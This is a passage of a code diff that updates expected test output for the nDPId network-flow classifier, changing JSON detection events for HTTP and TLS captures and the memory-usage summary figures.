+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127244,"flow_last_seen":1654385127425,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1654385229374,"flow_last_seen":1654385236412,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8604,"flow_avg_l4_payload_len":537,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385136215,"flow_last_seen":1654385137803,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":264022,"flow_avg_l4_payload_len":7333,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385128878,"flow_last_seen":1654385130178,"flow_idle_time":7580000,"flow_min_l4_payload_len":496,"flow_max_l4_payload_len":2746,"flow_tot_l4_payload_len":4982,"flow_avg_l4_payload_len":1245,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1654385136216,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":37440,"flow_tot_l4_payload_len":124465,"flow_avg_l4_payload_len":8890,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385128878,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"flow_min_l4_payload_len":817,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":844,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385129449,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":1181,"flow_avg_l4_payload_len":590,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":80,"flow_first_seen":1654385140171,"flow_last_seen":1654385145302,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":8640,"flow_tot_l4_payload_len":177845,"flow_avg_l4_payload_len":2223,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385139579,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1384,"flow_avg_l4_payload_len":692,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":2549,"packets-processed":2549,"total-skipped-flows":0,"total-l4-payload-len":4952452,"total-not-detected-flows":14,"total-guessed-flows":6,"total-detected-flows":177,"total-detection-updates":20,"total-updates":0,"current-active-flows":0,"total-active-flows":197,"total-idle-flows":197,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1081,"global_ts_msec":1654385236487} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2549/2549 ~~ skipped flows.............: 0 @@ -1089,9 +1087,9 @@ ~~ total active/idle flows...: 197/197 ~~ total timeout flows.......: 20 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6244637 bytes -~~ total memory freed........: 6244637 bytes -~~ total allocations/frees...: 121628/121628 +~~ total memory allocated....: 6328006 bytes +~~ total memory freed........: 6328006 bytes +~~ total allocations/frees...: 124379/124379 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 384 chars ~~ json string max len.......: 15998 chars diff --git a/test/results/443-chrome.pcap.out b/test/results/443-chrome.pcap.out index 66a408e90..9565f9e9a 100644 --- a/test/results/443-chrome.pcap.out +++ b/test/results/443-chrome.pcap.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871520 bytes -~~ total memory freed........: 5871520 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6005154 bytes +~~ total memory freed........: 6005154 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2429 chars 
diff --git a/test/results/443-curl.pcap.out b/test/results/443-curl.pcap.out
index aa04303c4..9e6549ebf 100644
--- a/test/results/443-curl.pcap.out
+++ b/test/results/443-curl.pcap.out
@@ -4,10 +4,10 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":109,"packets-processed":109,"total-skipped-flows":0,"total-l4-payload-len":66816,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113121570} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 109/109 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877520 bytes -~~ total memory freed........: 5877520 bytes -~~ total allocations/frees...: 118229/118229 +~~ total memory allocated....: 6011154 bytes +~~ total memory freed........: 6011154 bytes +~~ total allocations/frees...: 120991/120991 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1104 chars diff --git a/test/results/443-firefox.pcap.out b/test/results/443-firefox.pcap.out index a2a7b26a1..d550510f3 100644 --- a/test/results/443-firefox.pcap.out +++ b/test/results/443-firefox.pcap.out 
@@ -4,10 +4,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} 
-00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} 